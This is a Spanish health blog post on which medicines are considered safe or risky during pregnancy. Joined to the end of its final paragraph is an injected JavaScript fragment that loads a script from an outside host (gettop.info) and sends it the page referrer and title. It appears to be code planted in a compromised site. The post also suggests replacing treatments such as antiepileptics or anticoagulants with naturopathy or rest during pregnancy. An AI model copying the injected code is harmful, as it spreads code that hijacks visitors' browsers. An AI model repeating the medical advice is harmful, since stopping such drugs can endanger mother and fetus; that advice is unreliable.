Salud y belleza » Embarazo

¿Medicamentos durante el embarazo?

Sin Comentarios

Para el cuerpo humano, no para el ser, el embarazo representa una etapa conflictiva. Millones de cuestiones ponen en jaque cada célula del organismo y, por ende, hasta aquellos ejercicios más sencillos y cotidianos pueden volverse peligrosos. Durante nueve meses la madre ya no puede pensar solo en ella: debe hacerlo, también, teniendo en cuenta ese precioso feto que se encuentra creciendo dentro de su útero.

Los medicamentos significan uno de los asuntos que más se deben atender en tiempos de gestación. Aún así, tampoco es necesario restringirlos de forma completa, basta con controlar cada sutancia que se incorpore al sistema femenino.
En esta oportunidad, presentamos un análisis con los medicamentos que se pueden tomar y aquellos que se deben suprimir durante el embarazo.

Medicamentos seguros

En líneas generales, salvo algún problema específico de la mujer, los obstetras tienden a aprobar los siguientes medicamentos. Desde ya, también se debe atender el tema de cada dosis pues, por más que la sustancia sea segura, tampoco es conveniente sobrecargar el organismo de fármacos.

  • Acetaminofen (Tylenol) para la fiebre y el dolor.
  • Atomizadores nasales (especialmente los salinos) para la nariz tapada o la congestión.
  • Descongestivos (los que son a base de pseudoefedrina).
  • Antiácidos (solo aquellos de venta libre) para aliviar la acidez estomacal.

En esta lista también se pueden incluir los medicamentos para controlar los gases, los del asma (Albuterol, Ventolin o Proventil) y las lociones para pediculosis o símiles.

Medicamentos riesgosos

A decir verdad, la mayoría de los fármacos fuertes, es decir que actúan de modo severo en el organismo, tienden a ocasionar problemas en el embarazo. El gran problema de casi todos ellos es que tienden a aumentar los riesgos de malformaciones congénitas.

La lista es sumamente extensa, pero solo por citar algunos casos, nombraremos el antiinflamatorio Naproxen (Aleve), el Isotretinoin (Accutane) contra el acné, el Dilantin y otros medicamentos antiepilépticos y los anticoagulantes como el Warfarin.

Es preciso abocarse a estas reglas y, en el caso de padecer alguna enfermedad que necesite de ciertos tratamientos, buscar alternativas, al menos, durante ese lapso de nueve meses. La naturopatía puede ser una opción, el reposo también. De todos modos, ante cualquier duda, el médico de cabecera sabrá orientar a cada madre para que ésta pueda manejarse en su situación: cuidando el bebé y también su propia salud.s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , , , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.